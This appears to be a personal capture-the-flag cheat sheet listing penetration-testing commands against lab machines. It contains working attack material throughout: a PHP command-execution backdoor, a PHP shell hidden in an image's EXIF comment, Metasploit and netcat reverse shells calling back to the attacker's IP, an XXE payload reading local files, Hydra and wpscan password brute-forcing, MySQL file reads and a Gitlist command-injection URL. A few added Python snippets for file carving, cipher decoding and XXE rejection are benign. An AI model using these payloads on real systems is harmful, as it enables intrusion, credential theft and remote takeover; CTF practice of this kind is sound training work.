chreniuc/CTF

Steps to follow when participating to CTF

See all open ports, here

# All ports
nmap -p- 192.168.1.1
# Slower but finds more: runs OS/version detection and default scripts, which can flag e.g. a vulnerable FTP service
nmap -A 192.168.1.1

nmap -sV -A 192.168.1.1

nmap -A -O -T4 --script=vuln 192.168.1.66

Connect to a specific port

nc -n 192.168.0.157 13337

More info about the website:

whatweb http://192.168.0.157:80

Output:
http://192.168.0.157:80 [200 OK] Apache[2.4.27], Country[RESERVED][ZZ], HTML5, HTTPServer[Fedora Linux][Apache/2.4.27 (Fedora)], IP[192.168.0.157], Title[Morty's Website]

Dirbuster

dirbuster

wordlist: /usr/share/dirbuster/wordlists

dirsearch

https://github.com/maurosoria/dirsearch

./dirsearch -u host -e html,php,txt,cfg

Scan website with nikto

nikto -h host [-port p]

Scan wordpress site:

wpscan --url host --enumerate vp

# --enumerate vp: vulnerable plugins

wpscan --url 192.168.56.223/bull/ -r --enumerate u --enumerate vp --enumerate t --enumerate tt

# --enumerate u: enumerate users

Files in images here:

The terminating byte for a JPEG is FF D9 in hex

PK are the initials of Phil Katz, the inventor of the zip file

Image on image here

#!/bin/bash -ex

wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar
mkdir -p bin
mv stegsolve.jar bin/

# to start it
java -jar bin/stegsolve.jar

Find strings in image:

strings image.jpg

Add php code in image

exiftool -Comment='<?php passthru($_GET["cmd"]); __halt_compiler();' /root/picture.jpeg

Copy binary data from a file to another

dd count=38508 skip=100 if=sss.jpeg of=out.jpeg bs=1

# skip the first 100 bytes (start at offset 100, in decimal), then copy 38508 bytes, one byte at a time (bs=1)
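The signatures above (JPEG ends with FF D9, ZIP local headers start with "PK") are what you look for before running dd. As an added example that is not part of the original notes, this script locates those markers in a file, reports the offsets, and carves the hidden ZIP the way the dd command does by hand; the input is a constructed fake JPEG followed by a real in-memory ZIP.

```python
# Added example (not from the original notes): find a file hidden after a
# JPEG's FF D9 end marker via its "PK\x03\x04" local header and carve it.
import io
import zipfile

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
ZIP_LOCAL = b"PK\x03\x04"

def find_signatures(data):
    """Return (offset just after the JPEG, [offsets of ZIP local headers])."""
    jpeg_end = None
    if data.startswith(JPEG_SOI):
        eoi = data.find(JPEG_EOI)
        if eoi != -1:
            jpeg_end = eoi + len(JPEG_EOI)   # first byte after the image
    zips, pos = [], 0
    while (pos := data.find(ZIP_LOCAL, pos)) != -1:
        zips.append(pos)
        pos += 1
    return jpeg_end, zips

def carve(data, skip, count=None):
    """Same as: dd bs=1 skip=<skip> count=<count> if=in of=out"""
    return data[skip:] if count is None else data[skip:skip + count]

def build_sample():
    """Constructed input: a minimal fake JPEG followed by a real ZIP."""
    fake_jpeg = JPEG_SOI + b"\xff\xe0" + b"A" * 20 + JPEG_EOI
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("flag.txt", "FLAG{constructed-sample}")
    return fake_jpeg + buf.getvalue()

def extract_hidden_zip(data):
    """Carve the first ZIP that starts after the JPEG and return its files."""
    jpeg_end, zips = find_signatures(data)
    start = next((o for o in zips if jpeg_end is None or o >= jpeg_end), None)
    if start is None:
        return None
    with zipfile.ZipFile(io.BytesIO(carve(data, start))) as z:
        return {name: z.read(name).decode() for name in z.namelist()}

if __name__ == "__main__":
    sample = build_sample()
    print(find_signatures(sample))
    print(extract_hidden_zip(sample))
```

A real JPEG can contain FF D9 inside embedded thumbnails, so on real files check that the offset reported also lines up with where the PK header starts.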

Brute force passwords with HYDRA or wpscan

hydra -l elliot -P ~/fsocity.dic 10.0.2.4 http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR"

Where:
    -l specifies the username
    -P specifies the dictionary file
    http-post-form is the authentication method being used

and,

“/wp-login.php:log=elliot&pwd=^PASS^:ERROR”

roughly parses to,

    /wp-login.php the login page to attack
    log=elliot is the username on the form
    pwd=^PASS^ substitutes the passwords from the dictionary file
    ERROR tells it what to look for if it fails

Bruteforce 8 Point

  • Brute force ftp, ssh, mysql, postgresql, etc.

WPscan

wpscan -u 10.0.2.4 --wordlist ~/fsocity.dic --username elliot --threads 50

Generate wordlist based on the content from a website

cewl [ -m 6 ] -w passwords.txt http://derpnstink.local/weblog/

# [ -m 6 ] Minimum word size 6

# You can pass the words through john's rules, here's a tutorial: http://netsec.ws/?p=457
john --wordlist=passwords.txt --rules --stdout > words-john.txt

Root escalation

sudo -l   # list what the current user may run with sudo

sudo -i

# Method 2
# once we obtain a terminal on the remote, we can run the linux-exploit-suggester.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh && \
  bash linux-exploit-suggester.sh
# This will give us root escalation methods for the current distro (e.g. C programs which can be compiled)
#    [+] [CVE-2016-4557] double-fdput()
#    [+] [CVE-2016-5195] dirtycow
#    [+] [CVE-2016-5195] dirtycow 2

Check the services that are run by root

ps aux | grep root

PHP

Shell one-liner

https://gist.github.com/sente/4dbb2b7bdda2647ba80b

<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Using reverse shell with metasploit

Kali has some reverse shells for php: /usr/share/webshells/php, ex: php-reverse-shell.php

Change in that script the following lines:

$ip = '192.168.1.159';  // CHANGE THIS your IP, not VM ip
$port = 55555;       // CHANGE THIS your PORT(where the metasploit will listen)

Upload file to VM.

Open metasploit:

msfconsole

msf > use multi/handler
msf exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
# Output: payload => linux/x86/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.159
# Output: LHOST => 192.168.1.159
msf exploit(multi/handler) > set LPORT 55555
# Output: LPORT => 55555
msf exploit(multi/handler) > exploit
#
$ whoami

Open the page containing the shell; the handler catches the connection and you can type Linux commands (e.g. whoami) in the msfconsole session.

Reverse shell with nc

# From your pc
nc -l -k -p port


# From victim's pc
nc -e /bin/sh your_ip port

Wordpress

Plugin SlideShow < 1.4.7

Exploit WordPress using SlideShow Gallery Authenticated File Upload

msfconsole

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.1.74
set TARGETURI /weblog/
set WP_USER admin
set WP_PASSWORD admin
run

shell

PCAP

Get information from a pcap

ngrep -I capture.pcap

NC files

mcrypt -d the_wall.txt.nc

Just in case ROT doesn't work. The text below is Atbash (A↔Z, B↔Y, and so on), not a Caesar shift.

This

Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl fhv
KzhhKzhh.qkt rm liwvi gl tvg zxxvhh.

Decodes to this:

Hi Dimitri
If you are reading this I might be not alive. I have place a backdoor in Blackmarket
workshop under /kgbbackdoor folder you must have to use
PassPass.jpg in order to get access.
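As an added example that is not part of the original notes, the decoder below handles the case above: it tries every ROT shift plus Atbash and picks the candidate with the most common English words, so a text that "ROT doesn't work" on is still recovered. The ciphertext constant is the second line quoted above.

```python
# Added example (not from the original notes): brute-force ROT-n and Atbash,
# then rank candidates by a small common-word score.
import string

COMMON = {"the", "you", "have", "to", "in", "if", "are", "this", "is", "a"}

def atbash(text):
    """Mirror the alphabet: A<->Z, B<->Y, ... (same function encodes and decodes)."""
    out = []
    for ch in text:
        if ch.isupper():
            out.append(chr(ord("Z") - (ord(ch) - ord("A"))))
        elif ch.islower():
            out.append(chr(ord("z") - (ord(ch) - ord("a"))))
        else:
            out.append(ch)
    return "".join(out)

def rot(text, n):
    """Caesar shift by n positions, preserving case and non-letters."""
    up, lo = string.ascii_uppercase, string.ascii_lowercase
    table = str.maketrans(up + lo, up[n:] + up[:n] + lo[n:] + lo[:n])
    return text.translate(table)

def score(text):
    """Number of tokens that are common English words."""
    return sum(w.strip(".,/").lower() in COMMON for w in text.split())

def best_decode(ciphertext):
    """Return (label, plaintext) for the highest-scoring candidate."""
    candidates = [(f"rot{n}", rot(ciphertext, n)) for n in range(1, 26)]
    candidates.append(("atbash", atbash(ciphertext)))
    return max(candidates, key=lambda c: score(c[1]))

# Second line of the ciphertext quoted above
CIPHERTEXT = "Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev."

if __name__ == "__main__":
    print(best_decode(CIPHERTEXT))
```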

XXE injection

Here is more.

curl -d "@req.xml" -X POST -k https://172.25.1.130:15988/pool/process.php

# The file req.xml contains this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///home/teo/server" >]>
<root>
  <name>sebi</name>
  <tel></tel>
  <email>&xxe;</email>
  <password></password>
</root>
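The request above only discloses the file because the endpoint's parser resolves the external entity. As an added example that is not part of the original notes, this is how a hardened process.php-style handler would treat the same body: any document carrying a DOCTYPE or ENTITY declaration is rejected before the parser sees it, while a plain request is parsed normally. The request bodies are constructed (the first is a copy of req.xml above).

```python
# Added example (not from the original notes): refuse DTDs up front so
# external (SYSTEM) entities and expansion bombs never reach the parser.
import re
import xml.etree.ElementTree as ET

# Assumes a UTF-8/ASCII body; decode other encodings before this check.
DTD_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)

# Constructed copy of req.xml from the notes above
XXE_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///home/teo/server" >]>
<root><name>sebi</name><tel></tel><email>&xxe;</email><password></password></root>"""

# Constructed benign request
CLEAN_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<root><name>sebi</name><tel></tel><email>sebi@example.test</email><password></password></root>"""

class UnsafeXML(ValueError):
    pass

def parse_request(body):
    """Parse a process.php-style request; refuse any document with a DTD."""
    if DTD_RE.search(body):
        raise UnsafeXML("DTD / entity declarations are not accepted")
    root = ET.fromstring(body)
    return {child.tag: (child.text or "") for child in root}

def handle(body):
    """Return (status, payload) the way a hardened endpoint would."""
    try:
        return 200, parse_request(body)
    except UnsafeXML as e:
        return 400, {"error": str(e)}
    except ET.ParseError as e:
        return 400, {"error": f"malformed XML: {e}"}

if __name__ == "__main__":
    print(handle(XXE_REQUEST))
    print(handle(CLEAN_REQUEST))
```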

Curl

Make a request with a different user agent

curl -A "Three-eyed-raven" -X GET http://192.168.1.191/raven.php

# -A user-agent

Run imap request: Documentation, link2

curl "imap://mail.7kingdoms.ctf/INBOX;UID=1" -v -k --user "olennatyrell@7kingdoms.ctf:H1gh.Gard3n.powah"

DNS server

nslookup
> server 192.168.1.191
Default server: 192.168.1.191
Address: 192.168.1.191#53
# Query type
> set type=TXT
## Query
> winterfell.7kingdoms.ctf
Server:         192.168.1.191
Address:        192.168.1.191#53
## Query
> timef0rconqu3rs.7kingdoms.ctf

# Or you can use dig

dig @192.168.1.191  -t TXT timef0rconqu3rs.7kingdoms.ctf
dig @dns_server [query type] query

# Reverse lookup: get the name for an IP
dig @192.168.200.1 -x 192.168.220.17

PostgreSQL

psql -h 192.168.1.191 -U robinarryn -d mountainandthevale

## Show tables
> \d

# Show definition of view flag
> \d+ flag

Exploit Research

searchsploit [app]
searchsploit postgresql

Cryptography

Common Modulus attack with extended Euclidean algorithm: here

Read file using mysql

# Create table
mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "create table Flag (flag varchar(500));"

# load the file's contents into that table
mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "load data infile '/etc/mysql/flag' into table Flag;"

# You will get an error that will display the content of that file

Exploits

Gitlist - Source

http://localhost/gitlist/my_repo.git/blame/master/""`whoami`

WalkThroughs

Challenges

Helpful links
